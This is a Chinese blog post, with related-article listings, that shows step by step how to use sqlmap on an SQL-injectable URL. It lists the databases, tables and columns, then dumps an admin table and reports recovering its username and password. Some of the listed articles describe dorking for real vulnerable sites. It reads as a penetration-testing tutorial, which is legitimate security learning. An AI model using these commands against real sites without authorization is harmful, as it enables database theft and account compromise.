利用sqlmap获取网站帐号密码

最新推荐文章于 2024-05-17 08:18:18 发布
最新推荐文章于 2024-05-17 08:18:18 发布
阅读量4.8k 收藏 22
点赞数 5
文章标签: 网络安全 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66945507/article/details/124455383
版权

1. 判断是否存在注入点。并且根据显示内容得知数据库管理系统为MySQL

构造语句 sqlmap.py -u "url"

2.通过参数 --current-db(获取当前使用的数据库)

构造语句 sqlmap.py -u "url" --current-db

获得数据库名字

3. 通过参数 -D XX(指定数据库名),--tables获取 XX数据库的表名

构造语句sqlmap.py -u "url" -D maoshe --tables

 

 

获取到XX数据库(maoshe)的4个数据表名,其中admin存在帐号密码的字段可能性最大

4.通过参数  -D maoshe指定数据库名,-T admin指定数据表名,参数--columns获取admin数据表的字段

 构造语句sqlmap.py -u "url" -D maoshe -T admin --columns

 

 

 

 

5. 通过参数  --dump把当前使用的数据库导出为csv文件

得到 管理员账户为admin 密码为hellohack 

 

叶真人
关注
  • 5
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
利用sqlmap注入获取网址管理员账号密码
WINDY_PACE的博客
04-21 6501
sqlmap 靶场的攻击注入利用
【WEB安全】SQLMAP获取后台账号密码
yijinbaiyi的博客
01-21 1593
SQLMAP获取后台账号密码 一. SQLmap SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。 二. 常见注入类型 ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入 ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延迟语句...
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
最新发布
2401_84281629的博客
05-17 978
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
sqlmap,扫描网站数据库并得到用户名及密码!
专注前端技术,包括Web端、移动端、小程序、APP
02-04 9838
接着上篇文章,你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap,使用sqlmap对一个网站解剖分析! SqlMap的程序允许检查网站的SQL注入漏洞,XSS漏洞的存在,并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在漏洞。 如果该站点容易受到SQL注入的攻击,则骇客可以进行以下攻击: 从数据库接收信息,包括转储(整个)数...
sqlmap获取管理密码和用户名
weixin_51558394的博客
03-11 7177
sqlmap获取用户名
通过SQLmap数据库获取虚拟机架站的用户名和密码
07-13
通过SQLmap数据库获取虚拟机架站的用户名和密码
sqlmap 获取mysql密码_利用sqlmap 获取管理员账号密码
weixin_36400512的博客
02-06 2729
首先,先简单介绍下sqlmap简介:sqlmap是一种开源的支持的数据库MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。sqlmap支持五种不同的注入模式:UNION query SQL injection(可联合查询...
Sqlmap获取用户名与服务器.docx
04-14
Sqlmap 的主要功能是检测数据库系统的漏洞,包括 SQL 注入漏洞、数据库版本信息、数据库系统用户名和密码等。 在本文档中,我们将详细介绍如何使用 Sqlmap 工具获取数据库用户名和密码。下面是 Sqlmap 工具的使用...
sqlmap扫描网站工具
04-03
SQLMap是一款强大的、自动化SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。它能够帮助安全研究人员或渗透测试人员探测、验证和利用数据库漏洞,甚至完全控制系统。下面将详细介绍SQLMap的工作原理、...
利用sqlmapapi进行批量检测sql注入
03-28
本程序利用百度爬取特定的url链接,然后调用sqlmapapi(sqlmap自带的批量接口),进行注入的判断。 AutoSqli.py中option的设置可参考set_option.txt;可自定义判断注入的方法,例如,基于时间/布尔等。
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据库的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
Web暴力破解及SQL注入
08-09
Web暴力破解及SQL注入 已知owasp服务器内的网站用户名为:gordonb 密码为6位,前三位为‘abc’后三位为数字,对其进行爆破得到正确的密码并验证。 使用SQLmap对该网站的前3个SQL注入案例进行SQL注入,将用户名和密码展示出一张表,实现拖库操作。
sqlmap对dvwa靶场的账号密码进行破解
m0_52934166的博客
05-16 1417
据此我们可猜测一下账号密码会在哪个表里(首先盲猜是在users表里,查看字段是找到账号密码的手段之一,一般账号字段为user,密码字段为password)后启动xampp,并启动xampp里的apache和mysql后面按钮start进行启动,当apache与mysql变成下图绿色后就行了。通过sqlmap继续查看dvwa库的所有表(可得guestbook表与users表)下载后解压将解压的dvwa文件放到xampp安装目录的htdocs文件夹里。虚拟机搭建好后,相互ping能ping同就行。
sqlmap+nikto进行渗透测试获取管理员账号密码操作实例
WEL测试
10-18 8893
首先,在百度搜索输入框输入:inurl:asp?id=,在搜索列表中选择连接类似如下的url:http://域名/about.asp?id=325。 其次,打开BT5,打开sqlmap,执行如下格式命令:./sqlmap.py -u "http://域名/about.asp?id=325" --dbs --current-user,执行命令如下截图: 该命令是获取web服务操作系统、w
SQLMAP获取后台账号密码
weixin_45983744的博客
01-16 5586
QQ交流学习群:811401950 一. SQLmap SQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。 二. 常见注入类型 ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入 ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延...
Web渗透-Sqlmap工具使用
m0_62630794的博客
01-25 3603
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。以上的查询是指定带参数的url,同样我们也可以从文本文件中获取HTTP请求,这样就可以不设置其他参数。–tables是查询指定数据库里面的表。
sql注入——sqlmap的基础使用
qq_64875725的博客
04-21 376
-current-user #获取当前数据库用户名称。--users # 获取数据库用户。--passwords #获取数据库用户密码。--tables # 获取表。--dump #获取数据。--columns #获取字段名。--dbs #获取数据库
sqlmap使用教程(5)-信息获取
fanmeng2008的博客
01-24 1218
渗透测试过程中,信息获取得到数据库名称一般就可以,点到为止,渗透测试的目的是测试系统是否有风险漏洞,而不是为了获取数据库信息!
SQLmap使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
06-20 3万+
SQLmap是一款自动化SQL注入工具,kali自带。路径 /usr/share/sqlmap 一、目标 1、指定url 2、指定文件(批量检测) 3、指定数据库/表/字段 4、post请求 5、cookie注入 二、脱库 1、获取数据库 2、获取表 3、获取字段 4、获取字段类型 5、获取值(数据) 6、获取用户 7、获取主机名 8、搜索库、表、字段。 9、正在执行的SQL语句 三、WAF绕过
sqlmap获取数据库账号密码
09-19
sqlmap 是一款常用于检测和利用数据库中的安全漏洞的工具,但是需要明确指出,对于未经授权的测试行为是不被允许的。以下仅为技术介绍,不鼓励非法行为。 要使用 sqlmap 获取数据库账号密码,需要进行以下步骤: 1. 收集目标信息:首先,需要确定目标的URL或IP地址,以及可能存在的数据库类型(如MySQL、Oracle等)。这些信息将用于后续的测试。 2. 执行扫描:使用 sqlmap 工具,对目标进行扫描,尝试发现可能存在的数据库注入漏洞。sqlmap 将自动检测目标是否存在可利用的漏洞。 3. 验证漏洞:如果 sqlmap 检测到目标存在漏洞,需进行验证以确认漏洞的可利用性。sqlmap 可以根据漏洞类型,尝试不同的注入技术。 4. 获取账号密码:在确认漏洞可利用后,sqlmap 将根据所选的注入技术,尝试提取数据库的账号和密码信息。它可以通过读取数据库的配置文件、绕过验证或爆破等方式获取凭据。 需要注意的是,sqlmap 的使用必须遵守法律法规和道德准则。未经授权的获取数据是非法的,违反相关法律法规可能会受到严厉的处罚。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值